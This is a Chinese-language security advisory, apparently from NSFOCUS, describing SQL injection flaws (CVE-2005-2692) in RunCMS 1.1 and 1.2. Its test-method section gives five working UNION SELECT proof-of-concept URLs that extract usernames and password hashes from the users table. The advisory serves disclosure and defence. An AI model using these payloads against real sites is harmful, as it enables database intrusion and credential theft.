安全研究
安全漏洞
RunCMS NewBB_Plus和消息模块多个SQL注入漏洞
发布日期:2005-08-23
更新日期:2005-08-23
受影响系统:RunCMS RunCMS 1.2
RunCMS RunCMS 1.1A
RunCMS RunCMS 1.1
描述:
BUGTRAQ ID:
14631
CVE(CAN) ID:
CVE-2005-2692
RunCMS是一个用PHP编写的内容管理系统。
RunCMS的实现上存在多个输入验证漏洞,远程攻击者可能利用此漏洞非授权访问数据库。
RunCMS对多个脚本的没有对用户请求参数数据做充分的检查过滤,远程攻击者可能在数据中插入特定的SQL语句序列从而对数据库执行授权的操作。
<*来源:James Bercegay (
security@gulftech.org)
NT (
NT@IHSTeam.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=112439215217671&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/runcms/modules/newbb_plus/newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/
http://www.example.com/runcms/modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20runcms_users%20WHERE%201*&post_id=2'&topic_id=2&viewmode=flat&order=0
http://www.example.com/runcms/modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201*&post_id=2&topic_id=2&viewmode=flat&order=0
http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201*&op=print_pn
http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201*&op=print_sent_pn建议:
厂商补丁:
RunCMS
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.runcms.org/public/modules/news/浏览次数:2962
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |